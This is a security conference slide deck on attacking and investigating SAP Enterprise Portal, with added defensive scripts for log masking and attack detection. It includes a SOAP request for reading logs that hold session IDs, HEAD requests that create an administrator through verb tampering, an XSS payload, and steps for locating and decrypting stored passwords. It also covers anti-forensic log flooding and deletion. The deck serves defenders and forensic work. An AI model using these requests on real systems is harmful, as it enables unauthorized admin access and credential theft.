Invest in security
to secure investments
SAP Portal: Hacking and forensics
Dmitry Chastukhin, Director of SAP pentest/research team
Evgeny Neyolov, Security analyst, (anti)forensics research
ERPScan
Developing software for SAP security monitoring
Talks at 35+ security conferences worldwide: BlackHat (US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
First to develop software for NetWeaver J2EE assessment
The only solution to assess all areas of SAP Security
Research team with experience in different areas of security, from ERP and web security to mobile, embedded devices, and critical infrastructure, accumulating their knowledge on SAP research.
Leading SAP AG partner in the field of discovering security vulnerabilities by the number of found vulnerabilities
erpscan.com
ERPScan invest in security to secure investments
Dmitry Chastukhin: yet another security researcher, business application security expert
Agenda
SAP security
SAP forensics WTF?!
Say hello to SAP Portal
Breaking SAP Portal
Catch me if you can
Conclusion
SAP
The most popular business application
More than 180000 customers worldwide
More than 70% of Forbes 500 run SAP
More than 40% of ERP market in Poland
SAP security
Espionage
Stealing financial information
Stealing corporate secrets
Stealing supplier and customer lists
Stealing HR data
Fraud
False transactions
Modification of master data
Sabotage
Denial of service
Modification of financial reports
Access to technology network (SCADA) by trust relations
SAP security
[Chart: number of SAP security talks per year, 2003 to 2013, at BlackHat, Defcon, HITB, RSA, CONFidence, DeepSec, Hacktivity, Troopers and Source]
Source: SAP Security in Figures 2013
How easy? SAP Security Notes
More than 2600 in total
Is it remotely exploitable?
sapscan.com
> 5000 non-web SAP services exposed in the world
including Dispatcher, Message server, SapHostControl, etc.
What about other services?
[Chart: SAP services exposed worldwide: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd]
What about unpublished threats?
Companies are not interested in publishing information about their breaches
There are a lot of internal breaches thanks to unnecessarily given authorizations (an employee by mistake buys hundreds of excavators instead of ten)
There are known stories about backdoors left by developers in custom ABAP code
How can you be sure that, if a breach occurs, you can find evidence?
SAP Forensics
If there are no known attacks, it doesn't mean anything
Companies don't like to share them
Companies don't use the security audit (only ~10% do)
Even if it is used, nobody manages it (~5%)
Even if it is managed, there is no correlation (~1%)
Typical SAP audit options (share of companies using each*)
ICM log (icm/HTTP/logging_0): 70%
Security audit log in ABAP: 10%
Table access logging (rec/client): 4%
Message Server log (ms/audit): 2%
SAP Gateway access log: 2%
* The percentage of companies is based on our security assessments and product implementations.
What do we see?
A lot of research
Real attacks
Lack of logging practice
Many vulnerabilities are hard to close, so we need to monitor them, at least
What do we need to monitor?
External attacks on SAP*
* Ideally, we should control everything, but this talk has limits, so let's focus on the most critical areas.
Attacks on users and SAP GUI: awareness
SAProuter: secure configuration and patch management
Exposed SAP services: disable them
SAP Portal and web: too many issues and custom configuration, can be 0-days; we need to concentrate on this area
Say hello to Portal
Point of web access to SAP systems
Point of web access to other corporate systems
Way for attackers to get access to SAP from the Internet
EP architecture
Okay, okay. SAP Portal is important, and it has many links to other modules. So what?
SAP Logging
If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher's CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).
SOURCE: SAP HELP
* Not the only drawback: many complex attacks use POST requests, whose bodies a CLF access log does not record.
SAP J2EE Logging
Categories of system event recording:
System: all system-related security and administrative logs
Applications: all system events related to business logic
Performance: reserved for single activity tracing
Default location of these files in your file system:
\usr\sap\<sid>\<id>\j2ee\cluster\<node>\log\
SAP J2EE Logging
The developer trace files of the Java instance: <SID>\<instance name>\work
The developer trace files of the central services: <SID>\<instance name>\work and <SID>\<instance name>\log
Java server logs: <SID>\<instance name>\j2ee\cluster\server<n>\log
Full logging is not always the best option
SAP Management Console
SAP Management Console
SAP MMC: centralized system management
SAP MMC has remote commands
Commands are simple SOAP requests
They allow reading the trace and log messages
It's not bad if you only use it sometimes and delete logs after use, but...
SAP Management Console
What can we find in logs?
Right! The file userinterface.log contains the calculated JSESSIONID
But... the attacker must have credentials to read the log file?
WRONG!
SAP Management Console
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Header>
    <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
      <enableSession>true</enableSession>
    </sapsess:Session>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body>
    <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter/>
      <language/>
      <maxentries>%COUNT%</maxentries>
      <statecookie>EOF</statecookie>
    </ns1:ReadLogFile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Prevention
Don't use TRACE_LEVEL = 3
Delete traces when work is finished
Limit access to dangerous methods
Install SAP notes 927637 and 1439348
Mask security-sensitive data in the HTTP access log (see SAP Help)
Prevention
The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
By default, only the items listed below are masked:
Path parameter: jsessionid
Request parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
HTTP headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)
(see SAP Help)
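As an added example (not code from the talk or from SAP), a script that applies the same default masking list to copies of access-log and HTTP-trace lines before they are shipped to a second log store; the line layouts it recognises are assumed, and the values in the test are constructed.

```python
# Added example, not code from the talk or from SAP: apply the HTTP Provider's
# default masking list to copies of trace lines (request lines and headers) before
# they leave the system for a second log store. Line layouts are assumed.
import re

PATH_PARAMS = ("jsessionid",)
REQUEST_PARAMS = ("j_password", "j_username", "j_sap_password", "j_sap_again",
                  "oldPassword", "confirmNewPassword", "ticket")
COOKIES = ("JSESSIONID", "MYSAPSSO2")
MASK = "***"
METHODS = r"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS)"


def mask_url(url: str) -> str:
    """Mask ;jsessionid=... path parameters and the listed query parameters."""
    for name in PATH_PARAMS:
        url = re.sub(rf"(;{re.escape(name)}=)[^;?/]*", r"\1" + MASK, url, flags=re.I)
    for name in REQUEST_PARAMS:
        url = re.sub(rf"([?&]{re.escape(name)}=)[^&\s]*", r"\1" + MASK, url, flags=re.I)
    return url


def mask_header(line: str) -> str:
    """Mask Authorization and the sensitive cookies in a 'Name: value' line."""
    m = re.match(r"^([A-Za-z-]+):\s*(.*)$", line)
    if not m:
        return line
    name, value = m.group(1), m.group(2)
    if name.lower() == "authorization":
        return f"{name}: {MASK}"          # whole credential, whatever the scheme
    if name.lower() == "cookie":
        for cookie in COOKIES:            # other cookies (e.g. saplb_*) stay readable
            value = re.sub(rf"(\b{cookie}=)[^;]*", r"\1" + MASK, value)
        return f"{name}: {value}"
    return line


def mask_line(line: str) -> str:
    """Mask a request line (method + URL) or a header line; other lines pass through."""
    m = re.search(rf"\b({METHODS})\s+(\S+)", line)
    if m:
        return line[:m.start(2)] + mask_url(m.group(2)) + line[m.end(2):]
    return mask_header(line)


if __name__ == "__main__":
    import sys
    for raw in sys.stdin:                 # usage: script.py < responses.trc
        sys.stdout.write(mask_line(raw.rstrip("\n")) + "\n")
```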
SAP NetWeaver J2EE
Access Control
Declarative (by web.xml) or programmatic (by UME):
Web Dynpro: programmatic
Portal iViews: programmatic
J2EE web apps: declarative
Access Control
The central entity in the J2EE authorization model is the security role
Programmers define the application-specific roles in the J2EE deployment descriptors web.xml and web-j2ee-engine.xml
web.xml
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>
Slide annotation: the constraint lists only GET, which is what makes verb tampering possible.
Verb Tampering
If we try to get access to an application using GET, we need a login:password and the administrator role
What if we try to get access to the application using HEAD instead of GET?
PROFIT!
Did you know about ctc?
Verb Tampering
Need an admin account in SAP Portal? Just send two HEAD requests
Create new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence
Add the user CONF to the group Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
* Works when UME uses the Java database.
Prevention
Install SAP notes 1503579, 1616259, 1589525, 1624450
Install other SAP notes about verb tampering
Scan applications with the ERPScan WEB.XML checker
Disable the applications that are not necessary
Investigation
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0
Log file: j2ee\cluster\<node>\log\system\httpaccess\responses.trc
web.xml
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>HEAD</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>
Slide annotations: GET /admin/critical/CriticalAction is covered by the constraint on /admin/*; GET /servlet/com.sap.admin.Critical.Action reaches the same class through the invoker servlet, outside the constrained URL pattern.
Invoker Servlet
Want to execute an OS command on J2EE server remotely?
Maybe upload a backdoor in a Java class?
Or sniff all traffic?
Still remember ctc?
Invoker Servlet
Prevention
Update to the latest patch (SAP notes 1467771, 1445998)
EnableInvokerServletGlobally must be false
Check all WEB.XML files with the ERPScan WEB.XML checker
Investigation
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
The /System/Security/Audit category records that the Guest user created user CONF (USER.CREATE) through the ctc utility application, and the second entry shows the role check that passed the caller as a guest.
Investigation
XSS
Many XSSs in Portal
But the cookies are sometimes HttpOnly
But when we exploit XSS, we can use the features of SAP Portal: EPCF
EPCF
EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
Enterprise Portal Client Manager (EPCM)
iViews can access the EPCM object from every portal page or IFrame
Every iView contains the EPCM object
<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
</SCRIPT>
For example, EPCF is used as a transient user-data buffer for iViews
Prevention
Install SAP note 1656549
Investigation
#Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
Log file: j2ee\cluster\<node>\log\system\httpaccess\responses.trc
Web Dynpro JAVA
Web Dynpro unauthorized modifications
For example: somebody steals an account using XSS/CSRF/sniffing, then tries to modify the severity level of logs
Web Dynpro JAVA
Investigation
No traces of the change in the default log files
\cluster\server0\log\system\httpaccess\responses.log
Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
But sometimes we can find information by indirect signs:
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
The client loaded images from the server during some changes
Investigation
Most actions have icons
They have to be loaded from the server
Usually, legitimate users have them all in cache
Attackers usually don't have them, so they make requests to the server
That's how we can identify potentially malicious actions
But there should be correlation with a real user's activity
False positives are possible:
New legitimate user
Old user clears cache
Other
Directory traversal
FIX
Directory traversal fix bypass
Prevention
Install SAP note 1630293
Investigation
Patterns to search for in the access log: /../ and the encoded form !252f..!252f
Breaking SAP Portal
Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB
Found a file in the OS of SAP Portal with keys to decrypt passwords
Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
Decrypt passwords and log into Portal
PROFIT!
Read the file
How can we read the file?
Directory Traversal
OS Command execution
XML External Entity (XXE)
XXE in Portal: Details
Injection of malicious requests into XML packets
Can lead to unauthorized file read, DoS, SSRF
There is an XXE vulnerability in SAP Portal
Can be exploited by modification of POST request
It is possible to read any file from OS and much more
XXE in Portal
XXE in Portal
XXE
Error based XXE
XXE in Portal: Result
We can read any file, including the config with passwords
The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
Where are the passwords? (config.properties)
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
SecStore.properties
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
But where is the key?
config.properties (the same file shown above gives the key location):
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
Get the password
We have an encrypted password
We have a key to decrypt it
We got the J2EE admin and JDBC login:password!
Prevention
Install SAP note 1619539
Restrict read access to the files SecStore.properties and SecStore.key
Investigation
POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fadministrator!2fsuper_admin!2fsuper_admin_role!2fcom.sap.portal.content_administration!2fcom.sap.portal.content_admin_ws!2fcom.sap.km.AdminContent!2fcom.sap.km.AdminContentExplorer!2fcom.sap.km.AdminExplorer/ HTTP/1.1
Investigation
The only way to get HTTP POST request values is to enable HTTP Trace:
Visual Administrator -> Dispatcher -> HTTP Provider -> Properties: HttpTrace = enable
For 6.4 and 7.0 SP12 and lower:
On the Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
On the Server: \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
For 7.0 SP13 and higher:
/j2ee/cluster/dispatcher/log/services/http/req_resp.trc
Manually analyze all requests for XXE attacks
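As an added example (not code from the talk), a scanner that does the manual step above over an HTTP trace: it flags POST bodies carrying the markers of an external entity attack (an inline DOCTYPE, SYSTEM/PUBLIC or parameter entities, references to file or network URIs). The trace layout it parses (request line, headers, blank line, body, requests separated by a dashed line) and the sample requests are constructed, since the real req_resp.trc layout is not shown here.

```python
# Added example, not from the talk: find XXE markers in POST bodies of an HTTP trace.
# The block layout and SAMPLE_TRACE are constructed; adapt split_requests() to the
# real trace format before use.
import re

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?(?P<name>[\w.-]+)\s+(?P<kind>SYSTEM|PUBLIC)\s+"(?P<uri>[^"]*)"', re.I)
PARAM_REF_RE = re.compile(r"%[\w.-]+;")          # %name; reference inside a DTD
REMOTE_SCHEMES = ("file", "http", "https", "ftp", "gopher", "jar", "netdoc")


def split_requests(trace: str):
    """Yield (request_line, body) for each block of the constructed trace layout."""
    for block in re.split(r"^-{5,}\s*$", trace, flags=re.M):
        block = block.strip("\n")
        if not block:
            continue
        head, _, body = block.partition("\n\n")   # headers end at the first blank line
        yield head.splitlines()[0].strip(), body


def xxe_indicators(body: str) -> list:
    """Return the reasons a body looks like an XXE payload; an empty list means clean."""
    reasons = []
    if not DOCTYPE_RE.search(body):
        return reasons                            # no DTD, so no entity declarations
    for m in ENTITY_RE.finditer(body):
        uri = m.group("uri").lower()
        scheme = uri.split(":", 1)[0] if ":" in uri else ""
        if m.group(1):                            # '%' present: parameter entity
            reasons.append(f"parameter entity %{m.group('name')} -> {uri}")
        elif scheme in REMOTE_SCHEMES:            # local file or out-of-band fetch
            reasons.append(f"external entity {m.group('name')} -> {scheme}:")
        else:
            reasons.append(f"external entity {m.group('name')} ({m.group('kind').upper()})")
    if PARAM_REF_RE.search(body):
        reasons.append("parameter entity reference in DTD")
    if not reasons:
        reasons.append("inline DOCTYPE in request body")   # unusual for portal clients
    return reasons


def scan_trace(trace: str) -> list:
    """Return (request_line, reasons) for every POST whose body carries XXE markers."""
    hits = []
    for req_line, body in split_requests(trace):
        if req_line.startswith("POST "):
            reasons = xxe_indicators(body)
            if reasons:
                hits.append((req_line, reasons))
    return hits


SAMPLE_TRACE = """POST /irj/servlet/prt/portal/prtroot/example HTTP/1.1
Host: portal.example
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "file:///example.txt">]><r>&x;</r>
-----
POST /irj/servlet/prt/portal/prtroot/example HTTP/1.1
Host: portal.example
Content-Type: text/xml

<?xml version="1.0"?><r><name>legit</name></r>
-----
GET /irj/portal HTTP/1.1
Host: portal.example

"""

if __name__ == "__main__":
    for req_line, reasons in scan_trace(SAMPLE_TRACE):
        print(req_line, "->", "; ".join(reasons))
```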
Malicious file upload: Attack
Knowledge Management allows uploading to the server different types of files that can store malicious content
Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user
For example, it can be an HTML file with JavaScript that steals cookies
Malicious file upload: Attack
Malicious file upload: Attack
Malicious file upload: Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
* Again, images can help us.
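As an added example (not code from the talk), one detector that runs the access-log patterns from the Investigation slides above over responses.trc-style lines: the ctc verb tampering (HEAD succeeding where GET got 401), the reflected script tag, the /../ and !252f..!252f traversal, the log-configurator warning.gif, and the html.gif type icon following a POST to the KM DocsExplorer. The sample lines are constructed after the ones shown in the talk.

```python
# Added example, not code from the talk: detection rules over access-log lines in the
# layout of j2ee\cluster\<node>\log\system\httpaccess\responses.trc. All sample
# lines are constructed after the ones shown on the Investigation slides.
import re
from urllib.parse import unquote

LINE_RE = re.compile(
    r"(?:\[(?P<ts>[^\]]*)\]\s*-\s*)?(?P<ip>\d+\.\d+\.\d+\.\d+)\s*:\s*"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+HTTP/\d\.\d\s+(?P<status>\d{3})\s+(?P<size>\d+)"
)


def parse_line(line):
    """Split one access-log line into ts, ip, method, url, path, status (or None)."""
    m = LINE_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["url"].split("?", 1)[0]
    return rec


def analyze(lines):
    """Apply the rules in log order; returns a list of (ip, rule, url) findings."""
    findings = []
    denied_get = set()   # (ip, path) pairs where a GET was answered with 401
    km_posters = set()   # IPs that just posted to the KM document explorer
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, url, path = rec["ip"], rec["method"], rec["url"], rec["path"]
        decoded = unquote(url).lower()
        # Rule 1, verb tampering: a verb other than GET/POST succeeds where GET got
        # 401 from the same client, or any such verb hits the ctc ConfigServlet.
        if method == "GET" and rec["status"] == 401:
            denied_get.add((ip, path))
        if method not in ("GET", "POST") and rec["status"] == 200 and (
                (ip, path) in denied_get or path.startswith("/ctc/ConfigServlet")):
            findings.append((ip, "verb-tampering", url))
        # Rule 2, reflected XSS: a script tag survives URL decoding of the query.
        if "<script" in decoded or "</script" in decoded:
            findings.append((ip, "xss", url))
        # Rule 3, directory traversal: plain /../ or the !252f encoding of the bypass.
        if "/../" in decoded or "!252f..!252f" in url.lower():
            findings.append((ip, "directory-traversal", url))
        # Rule 4, Web Dynpro log configurator: an icon fetched from the server
        # during a change (legitimate admins usually have it cached).
        if "tc~lm~webadmin~log_config" in path and path.endswith(".gif"):
            findings.append((ip, "log-config-change", url))
        # Rule 5, KM upload of an HTML file: POST to DocsExplorer and then the
        # html.gif type icon from the same client.
        if method == "POST" and "com.sap.km.DocsExplorer" in path:
            km_posters.add(ip)
        elif ip in km_posters and path.endswith("/mimes/images/html.gif"):
            findings.append((ip, "km-html-upload", url))
            km_posters.discard(ip)
    return findings


SAMPLE = [  # constructed lines
    "[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790",
    "[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0",
    "[Apr 3, 2013 1:35:10 AM ] - 192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/"
    "com.sap.portal.usermanagement.admin.UserMapping?systemid=x%3Cscript%3Ealert(1)"
    "%3C/script%3E HTTP/1.1 200 3968",
    "[Apr 3, 2013 1:40:00 AM ] - 10.0.0.5 : GET /irj/go/km/docs/!252f..!252fsome_file HTTP/1.1 200 512",
    "[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/"
    "tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/"
    "warning.gif HTTP/1.1 200 110",
    "[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/"
    "HtmlbEvent/prtroot/pcd!3aportal_content!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968",
    "[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165",
    "[Apr 10, 2013 2:30:00 AM ] - 192.168.192.40 : GET /irj/portal HTTP/1.1 200 2048",
]

if __name__ == "__main__":
    for ip, rule, url in analyze(SAMPLE):
        print(f"{rule:<20} {ip:<16} {url}")
```

Rule 4 and rule 5 are the indirect image signs from the slides, so correlate them with the user's other activity before acting on them: a new user or a cleared cache produces the same requests.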
Malicious file upload: Prevention
Enable the File Extension and Size Filter:
System Administration -> System Configuration -> Content Management -> Repository Filters -> Show Advanced Options -> File Extension and Size Filter
Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter
Malicious file upload: Prevention
Enable the Malicious Script Filter:
System Administration -> System Configuration -> Content Management -> Repository Filters -> Show Advanced Options -> Malicious Script Filter
The filter also detects executable scripts in files that are being modified and encodes them when they are saved
Enable Forbidden Scripts: a comma-separated list of banned script tags that will be encoded when the filter is applied
Enable the Send E-Mail to Administrator option
Portal post-exploitation
Lots of links to other systems in the corporate LAN
Using SSRF, attackers can get access to these systems
What is SSRF?
SSRF History: Basics
We send Packet A to Service A
Service A initiates Packet B to Service B
Services can be on the same or different hosts
We can manipulate some fields of Packet B within Packet A
Various SSRF attacks depend on how many fields of Packet B we can control
[Diagram: Packet A -> Service A -> Packet B -> Service B]
Partial Remote SSRF: HTTP attacks on other services
[Diagram: a direct attack (GET /vuln.jsp) against the exposed HTTP server, versus the same request relayed through it into the corporate network as an SSRF attack]
Gopher uri scheme
Using the gopher:// URI scheme, it is possible to send TCP packets
Exploit OS vulnerabilities
Exploit old SAP application vulnerabilities
Bypass SAP security restrictions
Exploit vulnerabilities in local services
More info in our BH2012 presentation: SSRF vs. Business Critical Applications
Portal post-exploitation
Anti-forensics
Anti-forensics
Flooding
Deleting
Changing
Anti-forensics
Log flooding
5 active log files
Maximum log file size is 10 MB
Archiving happens when all logs reach the maximum size
If file.0.log reaches the maximum size, file.1.log is opened
If file.4.log reaches the maximum size, all files are zipped and backed up
The same files are rewritten after archiving
Anti-forensics
Log deleting
SAP locks write access only to the single active log
SAP allows reading/writing the other logs, so it is possible to delete them
It could expose the attacker's presence
Log changing
SAP locks write access only to the one active log
It is possible to write into any other log file
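As an added example (not code from the talk), a hash manifest of the closed log files, meant to live on the separate log store the Securing slide recommends, that reports which rotated files were later deleted, truncated or rewritten; it assumes the single active file SAP locks is the one named <name>.0.log, and the file contents in the test are constructed.

```python
# Added example, not from the talk: a SHA-256 manifest of the closed (rotated) log
# files, to be kept on a separate store, so that rewritten, truncated or deleted
# files are reported later. Assumption: the single active file SAP locks is the
# one named <name>.0.log, so it is skipped and hashed once it has rotated.
import hashlib
import json
from pathlib import Path

ACTIVE_SUFFIX = ".0.log"   # assumed name of the active (locked) log file


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def is_active(name: str) -> bool:
    return name.endswith(ACTIVE_SUFFIX)


def build_manifest(files: dict) -> dict:
    """files maps file name -> bytes; only closed logs are recorded."""
    return {name: {"sha256": sha256_hex(data), "size": len(data)}
            for name, data in files.items() if not is_active(name)}


def verify(manifest: dict, files: dict) -> dict:
    """Compare the current files with the manifest and bucket every difference."""
    report = {"modified": [], "truncated": [], "missing": [], "new": []}
    for name, expected in manifest.items():
        if name not in files:
            report["missing"].append(name)      # deleted since the manifest was taken
            continue
        data = files[name]
        if sha256_hex(data) != expected["sha256"]:
            # shorter than recorded: entries removed; otherwise rewritten or appended
            bucket = "truncated" if len(data) < expected["size"] else "modified"
            report[bucket].append(name)
    for name in files:
        if name not in manifest and not is_active(name):
            report["new"].append(name)          # rotated in since the last run
    return report


def load_dir(log_dir: str, pattern: str = "*.log") -> dict:
    """Read every matching file of a log directory into the name -> bytes map."""
    return {p.name: p.read_bytes() for p in sorted(Path(log_dir).glob(pattern))}


def manifest_to_json(manifest: dict) -> str:
    return json.dumps(manifest, indent=2, sort_keys=True)


def manifest_from_json(text: str) -> dict:
    return json.loads(text)


if __name__ == "__main__":
    import sys
    # usage: script.py <log_dir> <manifest.json>; the manifest is created if absent
    log_dir, manifest_path = sys.argv[1], Path(sys.argv[2])
    current = load_dir(log_dir)
    if manifest_path.exists():
        print(verify(manifest_from_json(manifest_path.read_text()), current))
    else:
        manifest_path.write_text(manifest_to_json(build_manifest(current)))
```

A "new" entry that appears on every run, with the previous files cycling through "missing", is the rotation pattern log flooding produces, so the run interval should be shorter than the time an attacker needs to fill five 10 MB files.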
Securing SAP Portal
Patching
Secure configuration
Enabling HTTP Trace with masking
Malicious script filter
Log archiving
Additional place for log storage
Monitoring of security events
Own scripts, parse common patterns
ERPScan has all existing web vulns/0-day patterns
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure
SAP Guides
Regular security assessments
Monitoring technical security
ABAP code review
Segregation of Duties
Security events monitoring
It's all in your hands
Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
July 31: BlackHat (Las Vegas, USA)
Web: www.erpscan.com
e-mail: [email protected]
Twitter: @erpscan, @_chipik, @neyolov